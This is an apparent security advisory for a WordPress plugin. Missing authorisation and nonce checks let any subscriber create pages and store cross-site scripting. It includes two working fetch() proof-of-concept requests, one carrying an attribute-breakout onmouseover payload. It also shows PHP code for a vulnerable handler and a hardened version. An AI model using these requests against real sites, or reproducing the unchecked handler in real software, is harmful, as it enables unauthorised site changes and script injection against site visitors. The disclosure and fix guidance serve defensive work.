wpexploit | Krzysztof Zając | WPEX-ID: 9E1AC711-1F65-49FA-B007-66170A77B265
Published: Jan 18, 2022 - 12:00 a.m.

Five Star Business Profile and Schema < 2.1.7 - Subscriber+ Page Creation & Settings Update to Stored XSS


EPSS: 0.001 (Low), Percentile: 24.8%

The plugin does not perform any authorisation or CSRF (nonce) checks in its bpfwp_welcome_add_contact_page and bpfwp_welcome_set_contact_information AJAX actions, so any authenticated user, including a subscriber, can call them to create a page and change the plugin's contact settings. Furthermore, because the submitted values are neither sanitised on input nor escaped on output, an attacker can store a value that breaks out of the HTML attribute it is later rendered into, leading to Stored Cross-Site Scripting (the second proof of concept below injects an onmouseover handler this way).

Page creation (run from the browser console while logged in as a subscriber; 127.0.0.1:8001 is the test instance):

// No nonce and no capability check are required by the vulnerable action,
// so a logged-in subscriber's session cookie is all that is needed.
fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "bpfwp_welcome_add_contact_page", "contact_page_title": "hey there!"}),
  "method": "POST",
  "credentials": "include"   // send the subscriber's WordPress cookies
});


Settings update (same session; the stored phone value is later rendered unescaped into an attribute):

// The payload closes the attribute the value is written into, adds an
// invisible element pinned over the whole viewport and attaches an
// onmouseover handler, so any mouse movement fires the script.
fetch("https://127.0.0.1:8001/wp-admin/admin-ajax.php", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded"
  },
  "body": new URLSearchParams({"action": "bpfwp_welcome_set_contact_information", "phone": '" style=left:0;top:0;right:0;bottom:0;position:fixed onmouseover=alert(1) x='}),
  "method": "POST",
  "credentials": "include"
});
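The three missing controls the advisory describes (authorisation, CSRF nonce, sanitisation) map onto three standard WordPress calls. The following is an added illustration, not the plugin's own code or the vendor's fix: a minimal wp_ajax handler in the vulnerable shape, the hardened equivalent for the bpfwp_welcome_set_contact_information action, and the output side. The handler and option names (bpfwp_example_*), the nonce action name, and the rendering template are assumptions; only the AJAX action name and the phone field come from the advisory.

```php
<?php
// Added example (assumed names), not code from the Five Star Business
// Profile and Schema plugin. Shows the advisory's missing checks and their fix.

// --- Vulnerable shape (NOT hooked; shown for contrast) ----------------------
// wp_ajax_* hooks fire for every logged-in user, so with no capability check
// and no nonce a subscriber can reach this, and the raw POST value is stored.
function bpfwp_example_set_contact_vuln() {
    $settings          = (array) get_option( 'bpfwp_example_settings', array() );
    $settings['phone'] = $_POST['phone'];   // e.g. '" style=... onmouseover=alert(1) x='
    update_option( 'bpfwp_example_settings', $settings );
    wp_send_json_success();
}

// --- Hardened shape ---------------------------------------------------------
add_action( 'wp_ajax_bpfwp_welcome_set_contact_information', 'bpfwp_example_set_contact_fixed' );

function bpfwp_example_set_contact_fixed() {
    // 1. Authorisation: only users who may manage settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // 2. CSRF: require a nonce minted for this action with
    //    wp_create_nonce( 'bpfwp_welcome' ) and posted as `_wpnonce`.
    //    check_ajax_referer() dies with -1 if it is missing or invalid.
    check_ajax_referer( 'bpfwp_welcome', '_wpnonce' );

    // 3. Input sanitisation. sanitize_text_field() strips tags and normalises
    //    whitespace but does NOT neutralise the `"` that breaks out of an
    //    attribute, so for a phone number also enforce an allow-list.
    $phone = sanitize_text_field( wp_unslash( $_POST['phone'] ?? '' ) );
    if ( ! preg_match( '/^[0-9 +().\-]{0,32}$/', $phone ) ) {
        wp_send_json_error( 'invalid phone number', 400 );
    }

    $settings          = (array) get_option( 'bpfwp_example_settings', array() );
    $settings['phone'] = $phone;
    update_option( 'bpfwp_example_settings', $settings );
    wp_send_json_success();
}

// The page-creation action needs the same two gates; the title is then
// passed through sanitize_text_field() before wp_insert_post().
add_action( 'wp_ajax_bpfwp_welcome_add_contact_page', 'bpfwp_example_add_page_fixed' );

function bpfwp_example_add_page_fixed() {
    if ( ! current_user_can( 'publish_pages' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    check_ajax_referer( 'bpfwp_welcome', '_wpnonce' );

    $post_id = wp_insert_post( array(
        'post_type'   => 'page',
        'post_status' => 'draft',
        'post_title'  => sanitize_text_field( wp_unslash( $_POST['contact_page_title'] ?? '' ) ),
    ), true );

    if ( is_wp_error( $post_id ) ) {
        wp_send_json_error( $post_id->get_error_message(), 500 );
    }
    wp_send_json_success( array( 'post_id' => $post_id ) );
}

// --- Output side: escape for the context you render into ------------------
// Even if a bad value reaches the database, esc_attr() turns `"` into &quot;
// so the stored payload cannot close the attribute and add onmouseover=...;
// esc_html() covers the text node and esc_url() the tel: link.
function bpfwp_example_render_phone() {
    $settings = (array) get_option( 'bpfwp_example_settings', array() );
    $phone    = (string) ( $settings['phone'] ?? '' );
    printf(
        '<a class="bp-phone" href="%s" data-phone="%s">%s</a>',
        esc_url( 'tel:' . preg_replace( '/[^0-9+]/', '', $phone ) ),
        esc_attr( $phone ),
        esc_html( $phone )
    );
}
```

The caveat worth checking in any fix for this class of bug: adding check_ajax_referer() alone stops the cross-site (CSRF) route but not a subscriber who can fetch the nonce from a page they can view, so the capability check is what actually closes the Subscriber+ path, and output escaping is what makes the stored value harmless regardless of how it got in.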

